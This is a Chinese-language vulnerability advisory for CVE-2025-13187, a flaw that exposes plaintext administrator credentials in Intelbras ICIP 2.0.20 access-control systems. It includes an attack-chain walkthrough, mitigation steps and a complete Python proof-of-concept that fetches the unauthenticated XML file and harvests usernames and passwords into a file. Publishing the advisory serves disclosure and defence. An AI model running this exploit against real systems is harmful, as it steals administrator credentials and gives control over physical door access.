IPBUF安全漏洞报告
English
CVE-2025-13187 CVSS 5.3 中危

CVE-2025-13187 Intelbras ICIP 管理员凭证明文泄露漏洞

披露日期: 2025-11-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-13187
漏洞类型
凭证明文存储/信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Intelbras ICIP 2.0.20

相关标签

CVE-2025-13187Intelbras ICIP凭证泄露明文存储信息泄露门禁系统XML注入未授权访问中危漏洞

漏洞概述

CVE-2025-13187是Intelbras ICIP(门禁/安防控制系统)2.0.20版本中的一个安全漏洞。该漏洞存在于系统的/xml/sistema/acessodeusuario.xml文件中,由于系统对用户凭证(用户名NomeUsuario和密码SenhaAcess)的存储缺乏适当的加密保护机制,导致管理员凭证以明文形式存储在XML配置文件中。攻击者无需任何认证即可远程访问该XML文件,直接获取明文形式的管理员用户名和密码。利用此漏洞,攻击者可以获取系统管理权限,进而对门禁系统进行完全控制,包括修改访问权限、添加或删除用户、解锁门禁等操作。由于该漏洞的利用难度低且公开可用,对使用受影响版本的企业和个人安全构成严重威胁。

技术细节

该漏洞的核心问题在于Intelbras ICIP系统将用户凭证以明文形式存储在XML配置文件中。具体来说,系统在处理用户认证相关信息时,将NomeUsuario(用户名)和SenhaAcess(密码)参数的值直接写入/xml/sistema/acessodeusuario.xml文件,而未进行任何加密或哈希处理。攻击者只需构造HTTP GET请求访问目标服务器的/xml/sistema/acessodeusuario.xml路径,即可获取完整的用户凭证列表。这些明文凭证包括管理员账户的用户名和密码,一旦被攻击者获取,即可利用获取的凭据登录系统管理后台。由于系统未对XML文件的访问进行权限控制,任何网络可达的用户都能直接获取这些敏感信息,形成了严重的信息泄露风险。

攻击链分析

STEP 1
步骤1
攻击者识别目标服务器上运行的Intelbras ICIP系统版本,确定版本为2.0.20
STEP 2
步骤2
攻击者构造HTTP GET请求访问/xml/sistema/acessodeusuario.xml端点,无需任何认证
STEP 3
步骤3
系统返回包含明文用户凭证(NomeUsuario和SenhaAcess)的XML响应
STEP 4
步骤4
攻击者提取XML中的用户名和密码,可直接用于登录系统管理后台
STEP 5
步骤5
攻击者使用获取的凭证登录系统,获取管理员权限,完全控制门禁系统

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-13187 PoC - Intelbras ICIP Plaintext Credentials Disclosure # Affected: Intelbras ICIP 2.0.20 # File: /xml/sistema/acessodeusuario.xml import requests import sys import re def exploit_cve_2025_13187(target_url): """ Exploit for CVE-2025-13187 - Intelbras ICIP plaintext credentials disclosure """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-13187...\n") # Target the vulnerable XML endpoint vuln_url = f"{target_url.rstrip('/')}/xml/sistema/acessodeusuario.xml" try: # Send HTTP GET request without authentication response = requests.get(vuln_url, timeout=10) if response.status_code == 200: print("[+] Successfully accessed vulnerable endpoint!") print(f"[+] Response length: {len(response.text)} bytes\n") # Parse and extract credentials content = response.text # Extract usernames (NomeUsuario) usernames = re.findall(r'<NomeUsuario>([^<]+)</NomeUsuario>', content) # Extract passwords (SenhaAcess) passwords = re.findall(r'<SenhaAcess>([^<]+)</SenhaAcess>', content) if usernames or passwords: print("[+] Credentials Found:") print("-" * 50) for i, (user, pwd) in enumerate(zip(usernames, passwords)): print(f" [{i+1}] Username: {user}") print(f" Password: {pwd}") print() # Save to file with open('credentials.txt', 'w') as f: f.write(f"CVE-2025-13187 Exploit Results\n") f.write(f"Target: {target_url}\n") f.write("=" * 50 + "\n") for user, pwd in zip(usernames, passwords): f.write(f"Username: {user}\nPassword: {pwd}\n\n") print("[+] Credentials saved to credentials.txt") else: print("[-] No credentials found in response") print("Response preview:") print(content[:500]) else: print(f"[-] Failed to access endpoint. Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") except Exception as e: print(f"[-] Unexpected error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-13187.py <target_url>") print("Example: python cve-2025-13187.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] exploit_cve_2025_13187(target)

影响范围

Intelbras ICIP 2.0.20

防御指南

临时缓解措施
在厂商发布修复补丁之前,建议采取以下临时缓解措施:1)使用网络ACL限制对/xml/sistema/路径的访问,只允许受信任的IP地址访问;2)配置Web服务器(如Nginx/Apache)对敏感XML文件进行访问限制;3)部署IPS/IDS系统监控对/vuln XML端点的异常请求;4)定期检查系统日志,排查是否存在针对该漏洞的探测和利用行为;5)考虑暂时关闭或隔离受影响系统的互联网暴露面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表